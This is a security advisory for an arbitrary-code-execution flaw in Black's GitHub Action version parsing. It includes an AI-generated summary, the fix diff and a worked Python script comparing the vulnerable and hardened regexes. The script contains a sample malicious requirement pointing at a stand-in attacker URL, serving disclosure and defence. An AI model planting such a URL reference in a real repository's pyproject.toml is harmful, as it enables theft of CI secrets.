Black's vulnerable version parsing leads to RCE in GitHub Action
Description
Black is the uncompromising Python code formatter. Black provides a GitHub action for formatting code. This action supports an option, use_pyproject: true, for reading the version of Black to use from the repository pyproject.toml. A malicious pull request could edit pyproject.toml to use a direct URL reference to a malicious repository. This could lead to arbitrary code execution in the context of the GitHub Action. Attackers could then gain access to secrets or permissions available in the context of the action. Version 26.3.0 fixes this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Black's GitHub Action allowed arbitrary code execution via malicious pyproject.toml in pull requests; fixed in version 26.3.0.
Vulnerability
Black, the Python code formatter, provides a GitHub Action that supports the use_pyproject: true option to read the Black version from the repository's pyproject.toml file. Before the fix, the action matched the `black` requirement with a regular expression that accepted anything following the package name, provided the first character was not a letter, digit, dot, underscore or hyphen, so a direct URL reference (e.g., black @ https://...) was passed through as if it were a version specifier [3]. A malicious pull request could therefore supply a requirement pointing at an attacker-controlled location, leading to arbitrary code execution within the GitHub Action runner [1][4].
Exploitation
An attacker submits a pull request that modifies pyproject.toml to include a direct URL to a malicious repository. When the GitHub Action processes this file, it installs the attacker-controlled package, executing arbitrary code in the context of the action. No additional authentication is required beyond triggering the action on the pull request [1][4].
Impact
Successful exploitation grants the attacker access to secrets and permissions available to the GitHub Action, such as repository secrets or cloud credentials. This could lead to compromise of the repository or connected services [1][4].
Mitigation
Version 26.3.0 of the action fixes the issue by hardening the version parsing: only standard version specifiers (e.g., ==, ~=, >=, and ranges such as >=25,<26) are accepted, and direct references such as black @ https://... are rejected [3]. Because the action is versioned independently of the Black package it installs, users who reference it as psf/black@stable receive the update automatically regardless of which Black version the action installs. As a workaround, avoid use_pyproject: true in workflows that run on untrusted pull requests (for example, from forks) and set with.version explicitly instead [3][4].
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
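As an added worked example (not code from Black or from this page), the two regexes from the fix commit are run side by side over constructed pyproject.toml contents, one benign and one as a pull request from a fork could rewrite it. The regexes are copied from the commit; the helper functions, the constructed TOML, and the assumption that the action builds its pip requirement as "black" plus the captured group are mine, not the project's. The example also goes beyond the advisory's single case by classifying several other requirement forms against both patterns.

```python
from __future__ import annotations

import re

try:
    import tomllib  # stdlib on Python >= 3.11, which use_pyproject already requires
except ModuleNotFoundError:  # pragma: no cover
    import tomli as tomllib  # type: ignore[no-redef]

# Both regexes are copied verbatim from the fix commit shown under "Patches".
# The pre-fix pattern accepts anything after "black" as long as the first character
# is not a letter, digit, dot, underscore or hyphen, so " @ https://..." is captured
# as if it were a version specifier.
OLD_BLACK_VERSION_RE = re.compile(r"^black([^A-Z0-9._-]+.*)$", re.IGNORECASE)
# The hardened pattern admits only a comma-separated list of operator+version pairs.
NEW_BLACK_VERSION_RE = re.compile(
    r"^black((?:\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)"
    r"(?:\s*,\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)*)\s*$",
    re.IGNORECASE,
)

# Constructed pyproject.toml contents (not taken from any real repository).
BENIGN_PYPROJECT = """
[project]
dependencies = ["requests>=2.0"]

[project.optional-dependencies]
dev = ["black>=25,<26", "ruff"]
"""

# What a pull request from a fork could change the file to (hypothetical URL).
MALICIOUS_PYPROJECT = """
[project.optional-dependencies]
dev = ["black @ https://evil.example/black-backdoor.git"]
"""


def requirements_from_pyproject(text: str) -> list[str]:
    """Collect every requirement string from [project] dependencies and
    optional-dependencies. The real action's lookup order is an assumption here."""
    project = tomllib.loads(text).get("project", {})
    reqs = list(project.get("dependencies", []))
    for group in project.get("optional-dependencies", {}).values():
        reqs.extend(group)
    return reqs


def black_specifier(text: str, pattern: re.Pattern[str]) -> str | None:
    """Return the text captured after 'black' for the first matching requirement,
    or None when no requirement passes the pattern."""
    for req in requirements_from_pyproject(text):
        match = pattern.match(req.strip())
        if match:
            return match.group(1)
    return None


def pip_requirement(text: str, pattern: re.Pattern[str]) -> str | None:
    """The requirement string the action would hand to pip. That it is built as
    'black' + captured group is an assumption of this example, not verified code."""
    spec = black_specifier(text, pattern)
    return None if spec is None else "black" + spec


def classify(requirement: str) -> tuple[bool, bool]:
    """(accepted by the old regex, accepted by the new regex) for one requirement."""
    return (
        OLD_BLACK_VERSION_RE.match(requirement) is not None,
        NEW_BLACK_VERSION_RE.match(requirement) is not None,
    )


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PYPROJECT), ("malicious", MALICIOUS_PYPROJECT)):
        print(f"{label:9s} old regex -> pip install {pip_requirement(doc, OLD_BLACK_VERSION_RE)!r}")
        print(f"{label:9s} new regex -> pip install {pip_requirement(doc, NEW_BLACK_VERSION_RE)!r}")
    # Other requirement shapes: the hardened pattern keeps PEP 440 specifiers and
    # drops URL references, but also stops matching extras and environment markers.
    for req in ("black==26.1.0", "black ~= 26.0", "black>=25,<26", "black==26.*",
                "black @ https://evil.example/x.git", "black[jupyter]==24.1.0",
                "black ; python_version >= '3.9'"):
        old_ok, new_ok = classify(req)
        print(f"{req:38s} old={old_ok!s:5s} new={new_ok!s}")
```

Running it shows the pre-fix regex handing pip a URL requirement for the malicious file while the hardened regex returns nothing for it; the classification loop also shows that `black[jupyter]==24.1.0` no longer matches the new pattern on its own, which matters only if the action does not strip extras before matching (the diff on this page does not show where EXTRAS_RE is applied).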
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| psf/black (GitHub Actions) | < 26.3.0 | 26.3.0 |
Affected products
- psf/black v5, Range: < 26.3.0
Patches
0a2560b98136 Harden Black action version parsing (#5031)
3 files changed · +17 −1
action/main.py+5 −1 modified@@ -17,7 +17,11 @@ USE_PYPROJECT = os.getenv("INPUT_USE_PYPROJECT") == "true" OUTPUT_FILE = os.getenv("OUTPUT_FILE", default="") -BLACK_VERSION_RE = re.compile(r"^black([^A-Z0-9._-]+.*)$", re.IGNORECASE) +BLACK_VERSION_RE = re.compile( + r"^black((?:\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)" + r"(?:\s*,\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)*)\s*$", + re.IGNORECASE, +) EXTRAS_RE = re.compile(r"\[.*\]") EXPORT_SUBST_FAIL_RE = re.compile(r"\$Format:.*\$")
CHANGES.md+7 −0 modified@@ -68,6 +68,13 @@ <!-- For example, Docker, GitHub Actions, pre-commit, editors --> +- Harden parsing of `black` requirements in the GitHub Action when `use_pyproject` is + enabled so that only version specifiers are accepted and direct references such as + `black @ https://...` are rejected. Users should upgrade to the latest version of the + action as soon as possible. This update is received automatically when using + `psf/black@stable`, and is independent of the version of Black installed by the + action. (#5031) + ### Documentation <!-- Major changes to documentation and policies. Small docs changes
docs/integrations/github_actions.md+5 −0 modified@@ -59,6 +59,11 @@ To read the version from the `pyproject.toml` file instead, set `use_pyproject` `project.optional-dependencies` table. Note that this requires Python >= 3.11, so using the setup-python action may be required, for example: +**Security note:** `use_pyproject` only accepts standard version specifiers for `black` +(for example `==`, `~=`, `>=` and ranges like `>=25,<26`). Direct references such as +`black @ https://...` are not supported. If your workflow runs on untrusted pull +requests (for example from forks), prefer setting `with.version` explicitly. + ```yaml - uses: actions/setup-python@v6 with:
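Review bot: in the action/main.py hunk the new BLACK_VERSION_RE requires a specifier operator immediately after `black`, so `black[jupyter]==24.1.0` no longer matches unless extras are stripped before the match; the hunk keeps `EXTRAS_RE = re.compile(r"\[.*\]")` as context but does not show where it is applied, so confirm the order of the two operations (or allow an optional extras group before the specifier) to avoid silently rejecting pyproject entries that declare extras, and document the behaviour in the docs note either way. None of the three changed files is a test: a unit test asserting that `black @ https://...` is rejected and that `>=25,<26` and `==26.*` are accepted would lock in the hardening.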
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
[1] github.com/advisories/GHSA-v53h-f6m7-xcgm (GHSA, advisory)
[2] nvd.nist.gov/vuln/detail/CVE-2026-31900 (GHSA, advisory)
[3] github.com/psf/black/commit/0a2560b981364dde4c8cf8ce9d164c40669a8611 (x_refsource_MISC, web)
[4] github.com/psf/black/security/advisories/GHSA-v53h-f6m7-xcgm (x_refsource_CONFIRM, web)